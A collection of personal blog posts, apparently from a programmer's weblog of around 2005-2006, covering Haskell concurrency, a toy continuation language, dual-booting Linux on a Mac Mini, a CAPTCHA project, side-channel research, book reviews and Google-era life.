    But anyway, I wrote up a very hacky program for extracting passwords from the memory of a running Firefox process - see the comments at the top for limitations.

    CPU clock skew side-channels

    This is great. He extracts timestamps from the TCP ISNs and uses that to measure skew of the CPU clock and thus the temperature. We can then tell how hard the CPU is working by measuring the temperature increase.

    People already know that time is a side channel and that you shouldn't leak information in the speed in which you process queries. Now you have to heat the CPU uniformly too. Giving out such good timestamps via the TCP ISN is probably a bad design and should be stopped. But there are many ways to get a timestamp from modern systems and noise just means that you need more samples.

    Erlang concurrency in the Haskell type system

    Say that we wanted to implement message-passing concurrency in Haskell. Haskell is a nice language which is ruled by its type system like a Mafia don. (It's easy to design yourself into a corner from which there's nowhere to go if you're not careful.)

    From first glance, things look promising. GHC has lightweight threads and message channels already. But, unlike Erlang, the message channels are typed. So what's the type of a message? Well, we could implement a ping/pong example with:

    data Message = Ping | Pong

    That works fine, but it means that for every different type of message in the system we have to have an entry in that union type.

    So let's try using the class system to define an interface which an actor can implement:

    data Message b = Xon Int | Xoff Int | Reparent Int b
    
    class DataSource a where
      xon :: a -> Int -> IO ()
      xoff :: a -> Int -> IO ()
      reparent :: DataSink b => a -> Int -> b -> IO ()

    The message sending operations are all implemented as IO () functions. Note that we have also used the type system to enforce that any actor passed to reparent has to implement the DataSink interface. Sadly, Haskell can't cope with cycles in the module graph, although cycles in the reference graph are just fine. So if DataSource named DataSink they would both have to be in the same module.

    newtype MySinkThread = MySinkThread (Chan DataSink.Message)
    
    instance DataSink.DataSink MySinkThread where
      write (MySinkThread chan) fd dat = writeChan chan $ DataSink.Write fd dat
      closed (MySinkThread chan) fd = writeChan chan $ DataSink.Closed fd

    There's the instance of a DataSink class, which has two messages: write and closed. The methods just add a message to the channel object. If the actor had several interfaces to implement we would need to create a union type of the Message types of each of the interfaces. This means that having default values for the class methods isn't going to work because we don't know how to wrap the values which get pushed on the channel. I expect we can use templates to generate all the instance decls.

    We can use a monad very like ReaderT to thread the channel through the body of the actor:

    newtype ActorT t m a = T (t -> m a)
    
    runActor :: t -> ActorT t m a -> m a
    runActor thread (T func) = func thread
    
    instance Monad m => Monad (ActorT t m) where
      return a = T (\_ -> return a)
      T func >>= k = T (\r -> do a <- func r
                                 let T func2 = k a
                                 func2 r)
    
    instance MonadTrans (ActorT t) where
      lift c = T (\_ -> c)
    
    this :: ActorT t IO t
    this = T (\r -> return r)

    And then there's the question of how to write receive. Currently I don't have a better solution than so pass a series of values to a unary lambda with a case statement and to catch the exception if the match fails:

    receive $ \x -> case x of
                      DataSink.Write fd d -> ....

    The receive also needs a way to store the values which didn't match so that they can be tried with future receives. Probably the ActorT can carry a list of such values. Also, any pattern match failure in the receive body will cause the next message to be tried - I don't know any way round that.

    In short: could work fairly well with some work

    libc functions of the week

    open_memstream and fmemopen (both link to the same manpage). These functions are for passing to libraries which expect a FILE * and you want to keep a buffer in memory. Certainly beats writing a temp file.

    Google Books PDF download launched

    Did you wonder what that JBIG2 compressor was for? Now you know

    WEP is now really, really dead

    “The final nail in WEP's coffin”

    Dual booting OS X and Linux on an Intel Mac Mini

    Headline: all the hardware works and seems to work well.

    Warning: the first time I tried this Bootcamp chomped the OS X filesystem and make the system unbootable. Pay attention to the Bootcamp warnings and backup any data you care about first.

    Prepping OS X

    I'm working from a completly clean OS X install here so you may have already done some of these steps:

    Select software update from the Apple menu and get 10.4.7 and all the fireware options offered (I only had one). After the reboot goto http://www.apple.com/support/downloads and search for “mini”. You want two fireware updates and the first (SMC) should have happened via Software Update. The other should now be listed. I don't know how stable the URLs are, but currently it's at:

    http://www.apple.com/support/downloads/macminiearly2006firmwareupdate101.html

    Follow all the instructions about installing the firmware and don't interrupt the process, lest you want to turn your mini into a brick.

    Boot into OS X (you can hold the Option key at startup to select the boot volume - but it should be the default) and install rEFIt from refit.sf.net. Reboot and check that everything works. rEFIt is an EFI bootloader which will be booting lilo for us.

    Get bootcamp from http://www.apple.com/bootcamp and install. It ends up in Applications/Utilities.

    Run it, don't make a driver CD and partition the disk however you want. Click “Restart Mac OS X” and check that the system can still boot.

    Insert a Gentoo 2006.0 minimal install CD and shutdown the system. Press the power button and hold 'c' to boot from the CD.

    With the 2006.0 install kernel the Sky2 NIC will work, but the wireless doesn't (yet) so you'll need a cabled Internet connection.

    You must use parted to partition the disk. The partition table is in GPT format and fdisk doesn't know about it. (Also, remember that when configuring the kernel).

    After the partitioning and mkfs you can check that the system still boots. But when you run the install CD again, the kernel won't know about any of your partitions (because it's a GPT, which I'm guessing the install kernel doesn't know about). Run parted and delete and recreate the partitions with the exact same numbers again and the kernel will suddenly know about them. You don't need to mkfs again (unless you changed the numbers). (When you do this in future you need to set the boot flag, rerun lilo and rerun the rEFIt partition tool because parted seems to clear all that.).

    Now, it's a standard Gentoo install. See http://www.gentoo.org/doc/en/gentoo-x86-quickinstall.xml

    You can find the kernel config I used at http://www.imperialviolet.org/binary/macmini/kernel-config. It's probably not perfect for most people, but it will get you booting. The important points are:

      Device Drivers -> SCSI -> low-level drivers -> SATA support -> Intel PIIX/ICH
      Device Drivers -> Network Device -> Ethernet (1000 Mbps) -> SysKonnect Yukon2
      ... -> ... -> Wireless LAN -> Wireless LAN drivers
    I'm using lilo. The /etc/lilo.conf config should look something like:
    lba32
    
    boot = /dev/sda
    map = /boot/.map
    
    prompt
    delay = 50
    vga = normal
    
    image = /boot/bzImage-2.6.17.3
    	root = /dev/sda3
    	read-only
    	label = 2.6.17.3
    Run lilo Run parted and do:
    • print
    • set
    • (the number of your partition, probably 3)
    • boot
    • on
    • quit

    Reboot

    At the rEFIt startup screen, select the partition tool and sync the MBR.

    With a bit of luck, rEFIt will give you the option to boot from the Linux on the HD. You should now be booting into Linux.

    Getting X working

    Using the new, modular X, you want to set VIDEO_CARDS=i810 in your /etc/make.conf and you need Xorg 7.1 to drive the 945GM found in the mini mac. To get that you may need ACCEPT_KEYWORDS=~x86

    I needed some tricks to get the correct resolution because my panel size (1680x1050) isn't in the native list of video modes. If you need this, see instructions a http://klepas.org/2006/04/09/ubuntu-on-the-inspiron-6400/

    You can see my xorg.conf at http://www.imperialviolet.org/binary/macmini/xorg - note the odd ForceBIOS option for getting the resolution correct. The 915resoltion arguments I'm using are: 915resolution 5a 1680 1050 32 (yes, set 32-bit depth here and 24-bit depth in the xorg.conf).

    Getting sound working

    The 2.6.17.3 kernel needs a patch to get the sound unmuted. Get it from here: http://hg-mirror.alsa-project.org/...

    Wireless

    The madwifi.org drivers for the Atheros work perfectly. Follow the newbie HOWTO on that site.

    If it all goes wrong

    Then just reinstall OS X and try again.

    Insert the OS X install CD and power on. Hold down 'c' to boot from the CD.

    The installer seems to make little or no effort to partition a disk so, if there are no volumes given as a target to install to, don't panic. Select Terminal from the menu and use diskutil to repartition the disk. The command will be something like diskutil partitionDisk disk0 1 "Journaled HFS+" OSX 1M.

    JBIG2 encoder released...

    JBIG2 encoder released

    I've gotten to go ahead t...

    I've gotten to go ahead to open source an JBIG2 encoder I wrote for work, look for that tomorrow or so.

    Summer of Code is active. Go look at that project list (even if you aren't going to do anything under SoC it's a central TODO list for open source software: something we've not had before).

    And this is a really cool paper about high speed concurrency in Haskell - with source.

    BBC podcasts

    Fantastic: after too much effort being put into Real-based stuff, radio 4 finally has downloadable MP3s of some shows. That's been going on for a while but the selection was very limited. Top of the new list is Newspod - a pick of the day of the BBC news. No the mention that the ever wonderful Now Show is also available.

    Patent crazyness

    I have a (fairly) well tested, fast onlines codes implementation which I would post here except that it's clearly not worth the pain when there's a crazy company which believes that it has a patent (baseless or otherwise).

    At least that company does, in fact, make something I guess.

    Control flow with continuations

    I've been hacking about with an interpreter for a little language I'm playing with. The end goals (as ever) as suitably vast, but for the moment I'm writing the dumbest interpreter possible. Here's a little snippet which actually runs:

    var if = { #test x y# (ifte test x y) }
    
    var cc = { return return }
    
    var while = { #test body#
      var k = cc
      if (test) {
        body return
        k k
      }
    }
    
    while { continue 1 } { #break# print }

    Here are the rules:

    • { starts a lambda, the arguments are named in between the # symbols
    • The continuation for the current function is called continue for anonymous lambdas and return for named lambdas
    • Symbols a b c are interpreted as calling a with b and c as arguments.
    • ifte returns its second argument if its first argument is true, other it returns its third argument

    And the explanation:

    if is a simple wrapper around ifte which passed its arguments to it and calls the result. So you pass a value and two callables and one of the callables is run.

    cc returns its own return continuation. In Scheme it would look like this:

    (lambda (cc) (call/cc (lambda (k) (k k))))

    Let's build the while loop up from parts. First, consider a function which is an infinite loop:

    var loop = {
      var k = cc
      k k
    }

    k is the continuation of cc, so if we call it upon itself, cc returns again and returns the same value: k

    Now we all a test callable. Each time round the loop we call the test to see if we should continue:

    var loop-while = { #test#
      var k = cc
      if (test) {
        k k
      }
    }

    Then it's just a case of adding a body argument and calling it every time. The body gets a single argument - the return continuation of the while function. If the body calls this it acts the same as a break in a C-like language.

    My frequency of posting h...

    My frequency of posting has dropped to the point where one would be forgiven for wondering if I was still alive. Well, rest assured that I'm not typing this from beyond the grave, it's just that Google is keeping me busy .

    None the less, I was motivated to post this:

    “consumers concerned about the scam should avoid PIN-based retail transactions, and chose instead to make signature-based, credit-card-style transactions when making purchases with debit or check cards at stores.”

    (from http://www.msnbc.msn.com/id/11731365/)

    Because, chip and pin is so much safer, right? No one could have predicted that putting people's pin numbers everywhere would make it easy to steal them.

    Charging for email

    Firstly, anything which upsets so many people clear has to be worth looking at, right. Well, it would actually appear not - they're all pretty boring.

    (p.s. from some of the descriptions of the specific cartoons on the news I'm not sure if they are actually on that page. Has anyone actually seen these cartoons?)

    Micropayments, fungible (cash) or otherwise (hashcash), have been suggested sa the solution to spam for a long time. Clearly it's a very tough deployment problem (you need lots of people to suddenly start using it), but it would appear that Goodmail have persuaded AOL and Yahoo to sign up (thus might have solved the deployment problem).

    The hope is that, by increasing the cost of sending email, one can make spam uneconomic. But it really doesn't appear that Goodmail is even trying to do that; unpaid email is treated the same as it always was. If the price is too high for spammers (and the quoted 1/4 cent probably is) then they won't pay and spam will be exactly the same as ever.

    As an email sender, the only reason I would wish to pay this is because I have good reason for sending the email (ecommerce confirmations etc) and I don't want the hassel of dealing with customers who's spam filters eat my emails. That's pretty weak. These people have had to deal with it for a long time and rarely can customers not dig through their filters to find an email that they're expecting.

    And since Goodmail are getting paid for each email, their motivation for not accepting emails from spammy senders isn't perfectly aligned with the interests of their customers. Clearly they don't want to squander any trust - but there's a strong temptation to see how far you can push customers for that extra bit of income.

    And is spam really a problem for anyone these days? I get about 200/day and > 95% fall into the spam trap with very few false positives (that's with Gmail). The spams which do get through are random assortments of words usually.

    So I predict that Goodmail will get few customers and make very little difference to anyone.

    (and clueless quote from that article: "I still gets e-mails from lists I signed up for three years ago, but I haven't responded to a single one." - then unsubscribe you moron!

    Google in China

    So Google have launched in China and are censoring results. This has made a lot of people very unhappy (we had protestors outside today voicing that unhappyness)

    Just to be clear, Google doesn't have an option of running an uncensored version in China - it's censored or nothing. It's only a company and, as such, has to follow the laws of the countries it operates in. But Google could have taken a stand and refused to join in. I guess that's what all those people wanted us to do. But here's the thing...

    I really don't think it matters

    Years ago there was a great hope that the introduction of the Internet into China would open the eyes of all the people. Once they knew about the opression under which they toiled, how could they stand it? Well, they did. Turns out that people will put it with it. The Great Firewall of China isn't perfect; it's main function is just to remind people that Big Brother is watching. These people know the oppression under which they toil and accept it. We believed too much in the power of the Internet and we were wrong.

    The driving force for change in China is capitalism, not free expression. All the recent improvements in the lot of the newly rich chinese can be traced to good old fashioned material want. And change in the future is going to come when the bulk of the, still very poor, people start to wake up to this fact. It's happening already and it's only going to get better.

    It might have been nice to make a stand for freedom in this case - but pointless. I really hope Google would never turn someone in like Yahoo did, that's just plain bad, but so far it's not worth the fuss.

    Open Rights Group Alive

    The UK's answer to the EFF is now up and running and accepting donations. I was at the 'birth' of it in Hammersmith last year when the pledge was setup to fund it.

    Well, they've reached 1000 members and it's time to pay up if you are one of them . I don't really want to use PayPal so they'll have to wait until I'm back in the country and I'll mail them a cheque (but I'll be back in a few weeks time; I think they can manage till then).

    Things one should read:Fa...

    Things one should read:

    • Factor - a programming language; very Forth like. I'm playing with it when I get a chance. I'm still not sure about stack based languages. They have nice advantages: factoring out functions is stupidly easy and when the data flow works, it's very elegant. But one cannot understand only part of a function (which is why each function must be small) and, when dealing with > 3 variables, the stack fuzz is crazy. None the less, factor has a good environment (based on jEdit, by the same author) and Erlang like concurrency.
    • Curve25519 a paper on a (fairly) novel public key system with highly optimised implementations, data-independent timing and 32-byte public keys? It just be DJB. (and for anyone who hasn't seen his break of AES)

    Things one should listen to:

    (both are BBC and so both need RealPlayer. Sorry. You can get them working with mplayer if you try.)

    Turns out that char isn't...

    Turns out that char isn't short for signed char, it's a distinct type:

    % cat tmp.c
    void foo(void)
    {
        signed char   *ps = "signed?";
        unsigned char *pu = "unsigned?";
    }
    % gcc -c tmp.c
    tmp.c: In function 'foo':
    tmp.c:3: warning: pointer targets in initialization differ in signedness
    tmp.c:4: warning: pointer targets in initialization differ in signedness

    From this thread

    So it's been a while sinc...

    So it's been a while since I've written anything here. In fact I probably haven't had a gap this long since the last time I worked at Google.

    A number of people have emailed to ask how I'm doing and I've had to batch up all the replies for the last week. Serving dinner at work is great from a healthy eating point of view, but I really don't feel like doing anything much when I get home at 8, 9, 10 o'clock after dining there. You all deserve personal replies, but it's Sunday evening, just before bed, as I write this and I have to admit that it's not going to happen.

    Over the weekend I moved into the forth place I've had since I've been here. I'm averaging three weeks in any one place so far but this place is going to last for a year - really it is. It's a really nice house in Palo Alto with four other people. Thanks to IKEA I now have some furniture but not, yet, any Internet connection here.

    And the climate is crazy. It's mid December and I can quite happily walk home at one in the morning in only a t-shirt. Of course the natives are complaining about the bitter cold and wrapping up in three or four layers, but such is the world.

    It's also the time of Company Christmas parties. Google's was last weekend and was suitably huge, taking up two San Francisco pier buildings. Turns out that the cheapest way to get to Palo Alto from SF at 3am is to hire a stretch limo. Odd but true, and a cool way to round off the evening.

    I'll not be home for Christmas, I've only been here a few months and my family shan't be there anyway. I suspect Christmas will probably be pretty quiet so, you never know, I might get round to writing another blog post by then .

    Lots of public domain books

    Read the Google weblog post if you want, but the operative information is that you goto Google Print and use the date operator to restrict searches to public domain books.

    If you are in the US you can use date:1500-1923 and, if you are outside the US, you can use date:1500-1846 (or proxy through a US host).

    Update: fixed link - thanks Aaron.

    Impressions of a Powerbook:

    • Exposé is very good - but I still like tiled window managers.
    • Quicktime destroys audio. I assume it's Quicktime, it happens for both iTunes and the DVD player. There's an FFT in there somewhere and it's spewing crap into the signal. No amount of turning off eq's and the like fixes it. (but if you know how, please do tell).
    • kqueue doesn't support events from the terminal. This is so silly that I almost can't believe that it's true, but it appears to be.
    • Where the hell is the page up button? That's really annoying. Update: Found it (Fn + arrow keys) - thanks Andy

    Blinking at the price

    Blink is really a collection of short stories (I've just finished it). They are well weaved together and they are all related - but I'm not sure that they really deserve to be in the same book.

    Usually a work like this would be presented as a more old fashioned argument but Blink gets by without any real structure at all. And it's a good read which sells well so I can hardly say that that's a bad idea. Yet, by the end, I was left wondering what exactly I should be taking away from this. I made a list of all the stories, grouped them together and came up with titles for each of the groups:

    • Given a lot of training your subconscious is a great parallel processing system. (Kuros; Red card, blue card; Double fault)
    • The scientific method works. (Gottman; Doctors who get sued; Cook County)
    • Your subconscious can screw you up (IAT; Priming; Warren Harding)
    • Conscious interference will screw up subconscious decisions (Speed dating; Verbal overshadowing; Different jams)
    • Bad surveys give you bad results (New Cola; Aeron chair)
    • People react badly under stress (Police in the Bronx)

    So it seems to me that the book is arguing six different things. Or, at least, it would be if it were arguing anything at all.

    Most of them are actually pretty interesting results, even if the point is pretty bland (e.g. the second group). I've heard about the system about divorces before, but the doctors getting sued was new to me.

    If I were forced to draw it all together I would have to say that it's a pretty damming attack on the notion of The Ration Being. That poor being has been under attack from lots of directions (esp neuroimaging) for years now and it does feel like the ideal of the rational, scientific mind is going the way of Newton's clockwork universe in the face of physiological quantum theory.

    (Just to recap, that means that my rational mind is flagging the fact that I don't seem to have a rational basis in believing that I'm rational. The irony is eye-watering)

    It's a fun read, but I couldn't help looking at the price on the inside cover and thinking that it's not that good a read.

    Malcolm Gladwell came to speak...

    ... at Google today (and we got free copies of “Blink” - don't you love Google.) It looks like his next book will probably have one of the themes that he talked on today.

    The first was conceptual innovation vs experimental innovation. Conceptual innovation is the eureka moment - a new idea which is just very good. Picasso is his example. Picasso made most of his ground breaking stuff when he was young, he planned it, it was a new idea and he faded out as he got older.

    Experimental innovation is the kind which takes a very long time to develop. First example: Cézanne. As opposed to Picasso he was unremarkable for decades. If you study his paintings from when he was 40 (Gladwell says) you would not predict that he would be world class in his 60s.

    Second example: Fleetwood Mac. Their first hit album was Rumours and it was their 16th album. Their long suffering record company supported them through 15 duff albums before getting some money back. (Can you imagine that happening today?)

    And that last comment seems to be Gladwell's hook for the book - we're missing too much experimental innovation because, as a society, we're geared towards conceptual breakthroughs

    Next topic; targeting elite kids. Gladwell, he claims, was one of the top three junior runners in Canada at age 14. You wouldn't know it to look at him and, although the Canadian government sent him to special running training etc, he didn't turn out to be a great runner at age 21 etc.

    Gladwell says that selecting at a young age is a terrible thing to do because performance in a given area (physical or mental) is a terrible predictor of success in that field when they get older. He seems to have a lot of studies to back this up. Education, he believes, should be more egalitarian.

    One interesting study he quoted was the relation between going to Harvard and earning more later in life. Harvard claims that going there is great for future income (and it would have to be because Harvard costs a lot) but it turns out that the biggest predictor for earning lots is applying to Harvard. You don't have to get in, you just have to be the sort of person who believes that they can and are willing to try it.

    Well there you go. I await the next book, Malcolm.

    Update: There's a recent text, by Gladwell, from the New Yorker about Harvard's entry system.

    I don't usually comment o...

    I don't usually comment on anything Google related here since I started, but I'll make an exception this time:

    Once upon a time there was a website, a kind of proto wiki, and, at the bottom of each page, was a link titled "Delete this page". The Google crawler did its crawl and that was the end of that website.

    (The reason it came to light is because the webmaster of that site emailed Google "asking for his website back" (or words to that effect) and I believe that we dug them out of the crawl data for him. But this is besides the point.)

    The point is that no one does that sort of thing any more. GET links on a website must not be mutable or you can be sure that one of a number of crawlers will mutate it.

    But people didn't really learn, they just retreated behind login pages and such and made all the same mistakes. Now 37signals, no less, a group which carried my respect (until today) is getting very upset that crawlers are getting behind the login pages all over again.

    I won't even comment that they seem to think that GWA has been pulled because of their blog post, nor about the commentators who are making a big deal of the MUST NOT vs SHOULD NOT wording in the spec. Here's the end result

    It's a bad idea - anywhere.

    (I'm not on the GWA team. This is not from them and involves no non-public knowledge of that project)

    Made it

    Am now living in Mountain View, CA. In a hotel at the moment, but with a week before I start work and Craigslist to hand, hopefully somewhere more permeant soon. I understand that most people start by living in Mt View and then, over time, move into San Francisco city proper as they realise how dull the nightlife is here.

    By booking a seat as far forward as I could and with a brisk walk off the plane, I managed to be one of the first people into border control and cut my Time to Clear Border Control to 10 minutes (from some two hours last time). Most of that time was taken up with the official complaining that I hadn't filled out one side of the I94 form. Perhaps I should have stood up for foreigners everywhere and pointed out that the words "For Government Use Only" were written in large, red letters across the top. In reality I said sorry in fear of being sent to the back of a queue of several hundred people which I had put so much effort into being at the front of. So I'm a coward, but a less tired and pissed off coward.

    The flip side of being fast through border control is that they can't clear the luggage off the plane that quickly. So, in future, it may be possible to look less like you're trying to get ahead of everyone while maintaining the same TTCA (Total Time to Clear Airport).

    Still the hotel is good and I've just got myself a bike to get around on. I need to change rooms, however, because I'm out of range of the wireless network for the hotel. Sitting in the lobby with a laptop is a pain. Oh, and ALSA is very upset about my laptop and that's foiled my plan to use SkypeOut. It's listing no soundcards and yet it's playing quite happily. Sadly recording is right out.

    I also see that Aaron Swartz has decided to keep with his startup company and not return to Stanford. And I was going to look him up now that I'm here too! Dropping out of college to start a company ... how's it feel to be a stereotype, Aaron?

    The Singularity Is Near

    book cover

    This is a big book, and not just because the font is really huge; yet I can't help but feel that it would have been much better had it been a lot smaller.

    It's broken into three main parts. The first consists of a lot of graphs to really hammer home the message that exponential growth is happening all around us. And it's all very convincing in the areas which he chooses. Certainly everyone has come to live with and expect transistor counts to double every 18 months or so, but I will admit that I didn't know that productivity per hour of a US worker is also rising exponentially. What's neat is exactly how many of these graphs are really good straight lines.

    That goes on for quite a while and then the main part of the book is a huge long list of all the cool things that are happening right now across a wide range of subjects. All these developments are introduced to support the idea of the singularity happening and, to give credit where it's due, Kurzweil does make solid predictions about when things will start the happen. The amount of research that has gone into this book is impressive and it reads like a 10,000 overview of most of the interesting work in science and engineering today. That's also the problem with it. There's page after page of the stuff and none of it ever goes into enough detail to really be interesting. As soon as you want to know more you're whisked away to the next wonderful development.

    There is a large section of notes referencing everything, and this is good. But it's very hard to say that the book as a whole is very interesting reading. There is a third section, his responses to critics, but I don't feel that I actually want to bother reading it having slogged through the first two sections.

    In the end, even if I'm convinced that it's all going to happen, just as he says, how is it useful information? Knowing that the washing machine is broken is useful information because it allows me to make better choices (e.g. to not bother trying to do any washing today). But knowing that the future is going to be wonderful is nice - but I can't see how it helps me yet. If I'm going to live for hundreds of years then maybe I should save more? But, if Kurzweil is right, then we will all be fantastically (materially) wealthy anyway, so it doesn't really matter.

    How ever you spin it, there's a lot of hard work between here and there, so get back to work and you might have a technological utopia in a few decades if you're lucky ;)

    "Walking the line that's painted by pride..."

    (I'm not sure if you get positive or negative points for knowing why I chose that title )

    So this weekend saw the first (maybe of many) Startup Schools, run by Y Combintator, which is Paul Graham's hacker starter helping company. I'm sure there is lots of stuff being written about it, but I can't give you any links right now because I'm sitting in Boston Airport and the WiFi costs about $8.

    Y Combinator have a couple of offices, one is walking distance from where I'm living in Mt View, the other is in Boston - the other side of the country. Guess where it was held? Nevermind, it gave me a chance to visit the east coast of the US, which I've never managed to do so far. The heavy rain certainly makes a difference from the montonous metrological monotone which is Bay Area weather. It's damp and cold here; it could almost be home. Photos on Flickr when I upload them.

    The event consisted of a party on Friday night, all day talks Saturday and, I think, something today, but I've to catch a flight. The speakers list was very impressive and uniformly the talks were excellent and very well received. Of course, Google was there with a recruitment talk which (In the opinion of several people more independent than I), kicked the arse of the Yahoo talk.

    It was very good meeting up with people; new people, people for the first physically, people unexpectedly and famous people. The latter category includes Stephen Wolfram (who is easer to talk to than to read), Paul Graham and Michael Mandel, the economics editor of Business Week.

    I don't know how many good startups will come of it. I'm certainly not going to be one of them (yet), comforable as I am in the generous embrace of Google. But Y Combinator is doing an excellent job.

    Still, I've a bike upside down on my kitchen floor with a punchture and a wheel nut which is too tight to get off with a spanner, a driving test to sort out, a better apartment to find and work tomorrow. Back to reality and, hopefully, back to posting a little more often than I have been.

    Startup School

    I'll be at Paul Graham's Startup School this October 15th in case anyone who reads this will be there too. It's not that I'm looking to get out of Google before I've even started, but all good things...

    Looks like I left it a little late to book the hotel though. All the near by ones are sold out on the Saturday and I've ended up in a Holiday Inn some way away. Nevermind, there are always taxis.

    Crappy laptops

    And I really need to replace this old laptop as my main system. I'm sure that it was good in it's day, but it was a hand-down from someone else many years ago and it just can't keep up with Firefox. Thankfully, Opera have now released their browser for gratis, and without advertising. I guess that they've decided that they aren't going to win the desktop wars now and they should concentrate on their mobile offerings.

    It's certainly lighter than firefox (my laptop goes swap crazy a lot less) and it properly threads the page rendering so that loading (say) Bloglines doesn't freeze the whole browser for many seconds.

    It's Javascript/general AJAXy support isn't so good. Gmail works though. And the tabs act slightly wrong when you close them - it switches to the last viewed tab, which is almost never what I want.

    Still, if you too have a system with only 64MB of memory then give it a shot.

    What are they doing to these recordings?

    So today I brought the new KT Tunstall album because it's winning lots of awards and sounded like it could actually be pretty good. I'm going to skip over why a pressed CD needed so much error correction work from cdparanoia on the first couple of tracks and skip straight to the mastering. Here's part of the (raw, PCM) waveform from the forth track (which I picked at random):

    There's clearly some headroom there, but it's been really aggressivly compressed - and it sounds like it. I've never heard a kick drum sound like the skin was a hot water bottle.

    Which is a terrible shame because there's good music under there somewhere.

    Update: just to compare I thought I'd show a bit of Dire Straits at the same scale:

    New pyGnuTLS release than...

    New pyGnuTLS release thanks to a patch from Johan Rydberg

    Nearly gone...

    12 days to go... A few things which I've been doing recently before I loose them:

    Adding libevent support to Gambit Scheme: [patch]

    Adding edge triggered support to libevent: [patch]. You need this for the Gambit patch. Also, does anyone know if Neils (the libevent maintainer) is still alive?

    A small libevent based async DNS library designed to be embedded into applications rather than shipped as a .so file. This acutally has a known, rare bug in it but I'll have a fix and a real release of this soon: [eventdns.c eventdns.h]

    Best definition ever:Macr...

    Best definition ever:

    Macroxenoglossophobia - Fear of long, strange words.

    (from Wikipedia)

    Skype and the telephone interface

    Technically I must say that I'm quite impressed with Skype. The voice quality is good and it even managed to deal with the computer I ran it on - which is behind two NATs.

    I think they could have done a little better with the interface however. It's just like a normal telephone system; you call someone and their computer rings. You even get missed calls and the like.

    I'd like to see a more asynchronous system. At the moment there's no difference between a call to catch up with someone and an urgent call about the sky falling. I'm discouraged from the former because it's such an interruption and the latter risks getting confused with something less urgent.

    So why can't I place a call and tick a box to say "Low priority" and leave a little text message. I set my Skype to low priority and wait. When the other party sets their Skype to low priority I get a dialog saying, do you want to make this call now?

    But, of course, I Skype isn't open source.

    The role of judges

    Mr Howard is echoing the prime minister in calling for judges not to thwart the wishes of Parliament.

    That's interesting because, in this country, Parliament (being the Commons, Lords and Monarch) is sovereign. That means that if they say that all due process is rescinded and that all left handed people are to be shot then there's no legal device to stop them.

    Therefore Parliament has no need to worry that any judge can overrule them.

    So the reason why Howard and Blair are warning the judges is because they want to keep both the Human Rights Act and whatever they are dreaming up at the moment. Having the HRA gives them a warm feeling and the belief that they are better than countries which perform torture in house, as opposed to outsourcing it.

    There's no such thing as judges overruling Parliament in this matter. The Commons is just afraid of someone calling them on their contradictions.

    CAPTCHA issues

    Jeffrey Baker managed to OCR some of the images produced by my CAPTCHA program. This isn't terrible because I knew that some of the images were almost flat and could probably be OCRed, so I tweaked the rotation code so to make more of the images come out with larger angles.

    What I hadn't expected was that people would have such trouble reading them. I did a quick test and got 100% on a small set (about 50) of images. But some people can't even manage the sample images on that page. I certainly tuned the program so that I could read them and assumed that everyone would be the same. Clearly not.

    That means that I can't increase the angles of the images to break the OCR.

    So I got to thinking this morning while trying to forget a slightly weird dream (I was asleep and dreaming, in a dream. Then I became aware that I was dreaming, but I thought that I was only one level deep before waking up, twice). The point of the 3D text was to try to make a translator reconstruct the 3d world. (Which is (or should be) pretty easy for a human).

    So, meet Sammy the Stick Man:

    Sammy the stick man

    He gets rotated in lots of directions and you have to name which part of him is lit up. In this case the answer would be "left foot". Couple of problems: only 6 possible values. That's not actually too bad for the use I want it for because I'll be giving the user lots of them to solve so I can get a measure of their success rate (which had better be > 1/6 for a human). Next: there's too few images. It would be too easy to have a human classify 1000 images and then have the computer do a dumb image closeness match.

    So Sammy doesn't get released into the real world but maybe something will come of it.

    Skype

    I've finally got round to getting Skype working with SkypeOut. Seems good. People are free to try me over Skype (nick: aglangley) as I'd be interested to see how the quality of computer to computer is.

    That's all sorted then

    Barring the actual delivery of the paperwork I now seem set to start at Google full time in October. I'll be moving to Mountain View in late September. Anyone with experience of this (e.g. getting a drivers license etc) is welcome to email me about now ;)

    Books (see last post) are disappearing. I've moved about 20 of them so far. I'm trying to sell a few of the larger ones on Amazon to see if I can make something off them. A few have gone but I expect I'll have more going free if the rest are still here in four weeks time.

    Can anyone explain why batteries work the whole world over? Nothing else does - certainly not mains power which varies in every axis you can think of. Did some company have a worldwide monopoly on batteries for years and set all the standards?

    Currently working on: a standard library for Gambit Scheme.

    Lots of books

    With a bit of luck and a following wind I'm leaving the country quite soon and so the utility value of all my books are rapidly approaching zero. Once I have to store them the value actually becomes negative.

    Thus, if you live near me there are a whole lot of free books going. Here are a couple of pictures of a couple of my bookshelves. If you see anything you like you are welcome to drop by and pick it up (email me first though). If you live further away and you're willing to cover the postage, drop me an email as well.

    Update: I'm living in Cheltenham for the moment, not London.

    Image 1

    Image 2

    Gambit

    I've been on about concurrency orientated programming languages for a while now and mostly I've been working in Python; because I like Python. But I keep hitting the edges of the language. Generators were a very promising feature before I knew what they actually were. When they were being discussed it looked like Python was going to get full coroutines, but in the end generators ended up being crippled in several ways:

    • You cannot yield inside a function call because, once you try to, that function then becomes a generator too. This is the big problem.
    • You can only pass values out of a generator, not the other way round. This may be addressed in Python 2.5 with PEP 342. You can already get around it to some degree by updating an external variable.

    I'm sure generators solved the needs of some percentage of users at a lesser complexity and runtime cost of full coroutines. But support for PEP 342 is already showing that they struck the balance too far to the side of minimal changes.

    But the good news is that someone is building Erlang like concurrency primitives with Gambit in the form of a project called Termite. Gambit is a Scheme which can compile to C code (as well as being interpreted) and has support for full lightweight threads and continuations. If you read the linked slides above by Joe Armstrong you'll see his challenge to language writers about the number of message passing threads in a ring. That challenge is well met by Gambit in the examples directory.

    Termite doesn't have a source code release yet, but it should be soon. And scheme certainly has all the power one could ever want (and a syntax that no one would want). I'll post further comment when Termite is real.

    Open source CAPTCHA

    All the open source CAPTCHA programs either seem to be written in PHP or they are really easy to OCR (or both). So here's one which I hope is tough to break, is open source (CC public domain licensed) and runs as a simple CGI so anything should be able to use it.

    Got back from opentech la...

    Got back from opentech late last night and you can find my pictures on flickr. You can find everyone else's there too. Well done to Dave, Sam and Polly for organising it.

    OpenID server

    As I've said before, OpenID is a distributed single sign-on system. It also seemed like a good time to have a play around with this Ruby on Rails thing that everyone is going on about.

    So there is now openid.imperialviolet.org. Have fun.

    Profiteering

    Profiteering is good. I just thought I needed to point that out in the light of this: "Vow to shame any owners caught profiteering".

    Economics is the study of the allocation of scarce resources. Capitalism is the best solution that we have to that problem. It has problems (imperfect information, corruption etc) but fundamentally the laws of supply and demand work better than anything else that people have tried.

